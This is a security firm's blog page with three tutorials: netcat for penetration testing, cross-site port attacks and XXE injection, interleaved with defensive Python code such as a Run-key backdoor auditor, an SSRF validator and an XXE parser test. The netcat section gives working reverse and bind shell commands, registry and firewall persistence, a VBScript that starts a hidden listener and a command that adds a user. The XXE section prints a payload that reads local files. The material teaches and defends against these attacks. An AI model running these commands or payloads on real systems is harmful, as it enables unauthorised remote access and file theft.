Friday, 23 March 2018

NETCAT


Netcat is a network utility for opening TCP and UDP connections and for sending and receiving data and files over them. It is well known as a tool for debugging and investigating networks. Netcat is also known as nc, or as the "swiss army knife" of networking, and it is one of the most important tools for network admins, programmers and penetration testers.


NETCAT SETUP:

Setting up netcat on Windows is very simple. Download netcat for Windows from https://joncraton.org/blog/46/netcat-for-windows/.
Once it is downloaded, extract the file into the C: drive. Then open a command prompt and navigate to the netcat directory (yes, we are lazy: the shortcut to open a command prompt in that directory is to go to the netcat folder, hold Shift, right-click, and choose “Open command window here”) and run nc.exe.
On Linux netcat is usually pre-installed, so there is nothing to do. If it is missing, open a terminal and type “apt-get install netcat”; this command will install netcat for you.
In this blog I am using Kali Linux as the attacker machine and Windows 7 as the victim machine.

PENETRATION TESTING WITH NETCAT

Netcat has two primary modes of operation: one is as a client, and the other is as a server. These two modes are a favourite of hackers, and penetration testers use them just as much.
The basic usage of the two modes is “connect to somewhere” and “listen for inbound”:
connect to somewhere: nc [-options] hostname port[s] [ports] ...   # netcat client mode
listen for inbound:   nc -l -p port [-options] [hostname] [port]    # netcat server mode
The most commonly used netcat options are:
-c shell commands    as `-e'; use /bin/sh to exec [dangerous!!]
-e filename          program to exec after connect [dangerous!!]
-l                   listen mode, for inbound connects
-n                   numeric-only IP addresses, no DNS
-p port              local port number
-u                   UDP mode
-v                   verbose [use twice to be more verbose]
-z                   zero-I/O mode [used for scanning]
Netcat’s most powerful option is -e prog. It is typically used in server mode, where it makes netcat run a program on the remote system: whenever a client connects to the listener, netcat starts that program and ties it to the connection.
nc -l -p 1234 -e cmd.exe     # Windows
nc -l -p 1234 -e /bin/sh     # Linux
These are the basics of netcat. If you are still a beginner with netcat, read this article for a clearer understanding: http://scitechconnect.elsevier.com/wp-content/uploads/2013/09/Introduction-to-Netcat.pdf
Let’s get into real-world penetration testing with netcat.
Let’s get a basic reverse shell from Windows 7:
nc -lvp 1234                             # Kali Linux
nc.exe 192.168.0.151 1234 -e cmd.exe     # Windows (the IP is the Kali IP address)
When the victim runs that command, I get a reverse shell in Kali.

POST EXPLOITATION WITH NETCAT

Post exploitation is the crucial phase of penetration testing, and the fun part too. So here are some of the fun things we can do with netcat.
Once we get a reverse shell from the victim system, the first thing to take care of is maintaining the connection.
Every attacker faces one big problem, session expiration. So here are some commands to make the session persistent.
@echo off
xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:\Windows\System32\" /y
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow protocol=UDP localport=449
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow program="C:\windows\system32\nc.exe"
NOTE: these commands must be run as administrator.

RUNNING NETCAT IN THE BACKGROUND

Here is a VBScript to run netcat in the background, so that you don’t have to wait for the user to restart their computer.
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Set objShell = Nothing
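A defender-side counterpart to the persistence entries above, added here as an example and not part of the original post: it parses the output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` (a constructed sample is embedded) and flags autorun values that launch a netcat-style listener tied to a shell, including a renamed binary that still carries the -l/-L and -e flags. The function names, the sample entries and the binary and shell name lists are my own assumptions.

```python
import re

# Constructed sample of what `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
# prints; the "system" value mirrors the persistence entry discussed above.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    system    REG_SZ    C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# Assumed name lists; extend them for your environment.
NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
SHELL_NAMES = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def parse_reg_query(text: str) -> list:
    """Turn `reg query` output into [{'name', 'type', 'data'}] records.
    Key paths are unindented; values are indented and separated by runs of spaces."""
    entries = []
    for line in text.splitlines():
        if not line.startswith(" "):
            continue
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) == 3 and parts[1].startswith("REG_"):
            entries.append({"name": parts[0], "type": parts[1], "data": parts[2]})
    return entries


def suspicious_reasons(command: str) -> list:
    """Explain why an autorun command line looks like a netcat backdoor, or return []."""
    tokens = command.replace('"', "").split()
    if not tokens:
        return []
    exe = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    flag_chars = set("".join(t[1:] for t in tokens[1:] if t.startswith("-")))
    listens = bool(flag_chars & {"l", "L"})   # -l / -L, also inside combos like -Ldp or -lvp
    execs = bool(flag_chars & {"e", "c"})     # -e prog / -c command
    shell = next((t for t in tokens[1:] if t.lower() in SHELL_NAMES), None)

    reasons = []
    if exe in NETCAT_NAMES:
        reasons.append("netcat binary")
    if listens:
        reasons.append("listens for inbound connections")
    if execs and shell:
        reasons.append(f"executes {shell} on connect")
    # A binary that is not netcat is only flagged for the listener-plus-shell combination.
    if exe not in NETCAT_NAMES and not (listens and execs and shell):
        return []
    return reasons


def audit_run_keys(text: str) -> list:
    """Return the autorun values worth an analyst's attention, with their reasons."""
    findings = []
    for entry in parse_reg_query(text):
        reasons = suspicious_reasons(entry["data"])
        if reasons:
            findings.append({"name": entry["name"], "data": entry["data"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_run_keys(SAMPLE_REG_QUERY):
        print(finding["name"], "->", "; ".join(finding["reasons"]))
```

The same check applies to the other autorun locations (HKCU Run, RunOnce, scheduled task actions): feed it the command line of each entry rather than the registry dump.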
Playing with the firewall
netsh advfirewall set allprofiles state off
– Turns the firewall off (Windows will notify the user)
netsh advfirewall set allprofiles state on
– Turns the firewall on
netsh advfirewall reset
– Resets the firewall back to its defaults
netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound
– Blocks all inbound traffic, allows outbound
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN
– Opens a port
netsh advfirewall firewall delete rule name="HTTP"
– Deletes the rule
Scheduled tasks
We can also mess with Windows scheduled tasks: we can create, delete and run a task.
Creating tasks
– SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
Deleting tasks
– SCHTASKS /Delete /TN "Backup and Restore"
Running tasks
– SCHTASKS /Run /TN "StartBackup"
Now let’s create a local user and grant it administrator rights:
net user /add briskinfosec Netcat /comment:"Approved through 3/07/2018 per CTO" /fullname:"brisk info sec"
Netcat can also be used for scanning ports on the network.
nc -v 192.168.0.170 -z 1-1000   # ip = target ip

OUTPUT:
root@7h3pr0xy:~# nc -v  192.168.0.170 -z 1-1000
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 554 (rtsp) open
(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
Sometimes we also need to randomise the port order against the target (the -r option); an IDS (intrusion detection system) or IPS (intrusion prevention system) will usually pick up a sequential sweep like the one above.
nc -v -r 192.168.0.170 -z 1-1000

OUTPUT:
root@7h3pr0xy:~# nc -v -r 192.168.0.170 -z 1-1000
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 554 (rtsp) open
While performing a penetration test, too little information will not help us move forward, so we look for more detail. Netcat has a verbose option (-v, or -vv for even more) which gives more information about the target.
nc -vv -r 192.168.0.170 -z 130-140

OUTPUT:
root@7h3pr0xy:~# nc -vv -r 192.168.0.170 -z 130-140
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 131 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
(UNKNOWN) [192.168.0.170] 130 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 134 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 133 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 140 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 132 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused
(UNKNOWN) [192.168.0.170] 138 (netbios-dgm) : Connection refused
(UNKNOWN) [192.168.0.170] 136 (?) : Connection refused
 sent 0, rcvd 0
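To make scan output like the above easier to work with (for a report, or for a defender comparing an authorised scan against what the IDS logged), here is a small parser added as an example; it is not from the original post. It reads the line format netcat prints with -v/-vv -z, a constructed sample of which is embedded, and the function names are my own.

```python
import re

# Constructed sample in the format netcat prints for `nc -vv -z` (not output captured from the post).
SAMPLE_SCAN = """\
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 131 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused
(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open
 sent 0, rcvd 0
"""

# One probe result per line: "<name> [<ip>] <port> (<service>) open"
# or "<name> [<ip>] <port> (<service>) : Connection refused".
PROBE_RE = re.compile(
    r"\[(?P<ip>[0-9a-fA-F.:]+)\]\s+(?P<port>\d+)\s+\((?P<service>[^)]*)\)\s*:?\s*(?P<status>.+?)\s*$"
)


def parse_nc_scan(text: str) -> dict:
    """Summarise a netcat -v/-vv -z scan: which ports answered, which refused, and the
    service names netcat looked up for them ('?' means no /etc/services entry)."""
    summary = {"host": None, "open": [], "closed": [], "services": {}, "unparsed": []}
    for line in text.splitlines():
        if not line.strip():
            continue
        m = PROBE_RE.search(line)
        if not m:
            # host-lookup notes, the "sent 0, rcvd 0" trailer, and anything unexpected
            summary["unparsed"].append(line.strip())
            continue
        port = int(m["port"])
        summary["host"] = m["ip"]
        summary["services"][port] = None if m["service"] == "?" else m["service"]
        if m["status"] == "open":
            summary["open"].append(port)
        else:
            summary["closed"].append(port)
    summary["open"].sort()
    summary["closed"].sort()
    return summary


def open_ports(text: str) -> list:
    """Just the ports that accepted a connection, in ascending order."""
    return parse_nc_scan(text)["open"]


if __name__ == "__main__":
    result = parse_nc_scan(SAMPLE_SCAN)
    print(result["host"], "open:", result["open"], "closed:", result["closed"])
```

Because -r randomises the probe order, the parser sorts the ports itself; the "unparsed" list is kept so that nothing netcat printed is silently dropped.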
Netcat can be used for offensive as well as defensive purposes. If you are good at programming, you can automate the whole process.
NOTE: use this swiss army knife in a useful way, so that no one gets hurt by its sharp edge.
Play safe and be safe.

AUTHOR

Venkatesh C.S
Security Engineer
BriskInfoSec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/

Friday, 16 March 2018

Cross Site Port Attack (XSPA)

 

CROSS SITE PORT ATTACK (XSPA)

INTRODUCTION:

A web application is vulnerable to Cross Site Port Attack if it processes user-supplied URLs and does not validate or sanitise the backend response received from remote servers before sending it back to the client. In certain cases those responses can be studied to identify service availability (port status, banners and so on) and even to fetch data from remote services in unconventional ways.
Detecting a potential XSPA vulnerability is very simple: if the web app takes a URL as input, tries to connect to it and returns the result, you can analyse the response. I have been trying this XSPA attack on the test application http://testphp.vulnweb.com/
Once I visited the test site, I selected the image categories option on the site, as follows.
Then I selected an image, which took me to the URL shown below.
Once I was on that page, I started capturing the backend response using the Burp Suite tool.
Burp Suite is a graphical tool for testing web application security. It was developed to provide a comprehensive solution for web application security checks; in addition to its basic proxy functionality it has extra features such as a scanner and an intruder, and more advanced tools such as a spider, repeater, decoder, comparer, extender and sequencer.
I cross-checked this site using my localhost with a few ports and captured the responses in Burp Suite; by this method we can precisely analyse the response for each port.
Here I captured the response for the image URL and cross-checked it against my localhost on port 80 (HTTP); I can see the response 200 OK (a normal response).
Once it fetches the normal result, you can confirm this for other ports like 22 (SSH), 21 (FTP), 25 (SMTP), 8080 (HTTPS) etc., and you can check the result in the browser as well.

During port analysis, if the requested port is closed, it fetches a result like the following:
It still shows a 200 response, but it displays a warning such as “failed to open” or “connection refused”; if you see this kind of error you can confirm that the port is closed.
The screenshot above shows the case where the port is open: the result comes back without exposing the attacker’s IP in the server logs, and it also reveals the backend service running on SSH.

MITIGATION FOR XSPA ATTACK:

  • Access to unauthorised URLs should be restricted
  • Restrict connectivity to internal ports
  • Whitelist IP addresses
  • Disable unwanted protocols and services
  • You can block your ports using a firewall for better security; please check the link below to block your internal ports
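The mitigation list above amounts to an allow-list for outbound fetches. This is an added example of such a validator, written here and not taken from the post: it checks scheme, port and host against a policy and then resolves the name, so an allow-listed host that points at an internal address is still refused. The function names, the allowed port set and the sample allow-list are assumptions; the resolver is injected so the check can be unit-tested without DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed policy: only these schemes and ports may be fetched on a user's behalf.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host: str) -> set:
    """Every address the name maps to (real DNS); the validator checks all of them."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_non_public(ip_text: str) -> bool:
    """Loopback, RFC 1918, link-local, CGNAT, documentation and other non-global ranges."""
    return not ipaddress.ip_address(ip_text).is_global


def validate_fetch_url(url: str, allowed_hosts: set, resolver=resolve_all) -> tuple:
    """Return (ok, reason). Rejects anything that would turn the fetcher into a port scanner."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parts.hostname          # strips userinfo, so "trusted@127.0.0.1" yields 127.0.0.1
    if not host:
        return False, "no host"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    if host.lower() not in {h.lower() for h in allowed_hosts}:
        return False, "host not on allow-list"
    try:
        addresses = resolver(host)
    except OSError:
        return False, "name resolution failed"
    # An allow-listed name can still point at an internal address (misconfiguration or DNS rebinding).
    for addr in addresses:
        if is_non_public(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    print(validate_fetch_url("https://images.example.com/cat.jpg", {"images.example.com"},
                             resolver=lambda h: {"93.184.216.34"}))
```

Resolving once here and then letting an HTTP client resolve again leaves a rebinding window; in production, connect to the address that was validated rather than to the name.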
Reference Link:

CONCLUSION:

An XSPA attack is mainly used to port-scan a target through another, vulnerable website; an attacker can also use it to perform DoS attacks, code execution and other major attacks against other vulnerable websites.
Reference Link:

AUTHOR

RamKumar G
Security Engineer
BriskInfoSec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/ram-kumar-3439b511a/

Tuesday, 13 March 2018

Detection and Exploitation XML Entity Injection(XXE)

DETECTION AND EXPLOITATION XML ENTITY INJECTION(XXE)

INTRODUCTION

XML External Entity Attack is a type of injection or input-validation vulnerability. It occurs in an application that allows an input parameter or data to be XML, or to be combined into XML form data, which is then passed to an XML parser running with sufficient privileges to include external or system files.
Recently there has been an increase in the use of XML documents due to the growing use of web services such as REST APIs and SOAP, which commonly use XML to process data.
XML has a feature to create entities dynamically; some entities are predefined, and they are referenced using an ampersand (&) at the start and a semicolon (;) at the end. However, XML also lets us define custom entities, the most common being internal and external entities. Internal entities can be used to reference internal data, and external entities to reference data from external sources.

EXAMPLE FOR INTERNAL ENTITY:

<!DOCTYPE profile [<!ENTITY name "Brisk Infosec">]>
<profile>
<name>&name;</name>
<class>Cyber Security</class>
<service>Pentest</service>
</profile>
In the first line we define an entity “name” with the value “Brisk Infosec”; the block used to define entities is known as the DTD block. Then, in the third line, you can see that we reference the entity as “&name;”, which expands to “Brisk Infosec”. This way we don’t have to type the name each time; all we have to do is reference the entity.

EXAMPLE FOR EXTERNAL ENTITY:

<!DOCTYPE profile [<!ENTITY name SYSTEM "http://target.com/profile">]>
<profile>
<name>&name;</name>
<class>Data</class>
<service>pentest</service>
</profile>
In the first line, in the DTD block, we have defined an external entity, which contains a link to an external resource. When this XML document is processed, it would request an external source and would replace values of all instances of “&name;” with the content of the external resource. If the content of the external resource is processed and displayed back to the user without proper validation, an attacker may be able to abuse the parser in conducting an XXE injection attack.
To find an XXE (XML External Entity) vulnerability, an attacker or tester needs to inject XML characters into all input fields and observe whether XML parsing errors are generated.

EXPLOITATION OF XXE VULNERABILITY:

Use information disclosed in error messages to determine which file path the XML parser is reading from. Cause errors to occur using malformed XML.
Let us consider a test website (here I’m using the OWASP Mutillidae application):
1. In the image below, the application has an XML parser input page.
2. Let’s try giving it some XML input and check the response from the server.
3. After that, we can try to inject XML input with multiple user-defined entities.
4. Now we can try to include external data using the <!ENTITY> section of the XML input. The <!ENTITY> section of an XML document optionally defines external files to be included as part of the XML document. Interestingly, these can even be files from the system parsing the XML.
Using the <!ENTITY> section of the XML input, we can try to access local files such as /etc/passwd on a Linux server.
5. Once we submit the above XML payload, we get the contents of the password file from the back-end Linux server.
6. Similarly, if the server is running Windows, we can try to load boot.ini using an XML payload like the one below:
<?xml version="1.0"?>
<!DOCTYPE change-log [
    <!ENTITY systemEntity SYSTEM "../../../../boot.ini">
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>

MITIGATIONS FOR XXE INJECTION ATTACKS:

1. XML parser functions such as an unmarshaller should have a secure configuration that does not allow external entities as part of an incoming XML document.
2. XML input should not be processed directly as java.io.File or java.io.InputStream.
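The external-entity example and the boot.ini payload above, turned into a regression check for the first mitigation. This is an added example, not code from the post, and it uses Python's standard-library xml.sax parser as a stand-in for the Java unmarshaller the post mentions: the same payload shape is parsed once with external general entities enabled (the vulnerable configuration) and once with them disabled, and a DOCTYPE pre-check rejects DTD-carrying input outright. The temp file standing in for boot.ini, its contents and the function names are my own assumptions.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data found inside <text> elements."""

    def __init__(self):
        super().__init__()
        self.in_text = False
        self.text = ""

    def startElement(self, name, attrs):
        if name == "text":
            self.in_text = True

    def endElement(self, name):
        if name == "text":
            self.in_text = False

    def characters(self, content):
        if self.in_text:
            self.text += content


def has_doctype(xml_bytes: bytes) -> bool:
    """Pre-check: untrusted XML has no business carrying a DTD or entity declarations."""
    return b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes


def parse_text(xml_bytes: bytes, allow_external_entities: bool) -> str:
    """Parse and return the <text> content. allow_external_entities=True reproduces the
    vulnerable configuration; False is the hardened one (also the stdlib default since 3.7.1)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def safe_parse_text(xml_bytes: bytes) -> str:
    """Hardened entry point: refuse any DTD up front, then parse with external entities off."""
    if has_doctype(xml_bytes):
        raise ValueError("DTD/entity declarations are not accepted in untrusted XML")
    return parse_text(xml_bytes, allow_external_entities=False)


def build_payload(path: str) -> bytes:
    """The post's boot.ini payload shape, pointing at a file path we control (constructed)."""
    return f"""<?xml version="1.0"?>
<!DOCTYPE change-log [
    <!ENTITY systemEntity SYSTEM "{path}">
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>""".encode()


def demo() -> dict:
    """Run the three cases against a temp file standing in for a sensitive local file."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("constructed-secret-contents")   # stand-in for boot.ini or /etc/passwd
        path = f.name
    try:
        payload = build_payload(path)
        results = {
            "vulnerable": parse_text(payload, allow_external_entities=True),
            "hardened": parse_text(payload, allow_external_entities=False),
        }
        try:
            safe_parse_text(payload)
            results["pre_check"] = "accepted"
        except ValueError:
            results["pre_check"] = "rejected"
        results["benign"] = safe_parse_text(b"<change-log><text>hello</text></change-log>")
        return results
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for case, value in demo().items():
        print(f"{case}: {value!r}")
```

Run this as a unit test next to the real parser configuration: if "vulnerable" ever equals "hardened" in the wrong direction, someone has re-enabled entity resolution. The DOCTYPE check is the cheaper control and is what OWASP recommends when the application never needs a DTD.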
References:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
https://stackoverflow.com/questions/40649152/how-to-prevent-xxe-attack

Dawood Ansar
Security Engineer
BriskInfosec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/dawood-ansar-29403213b/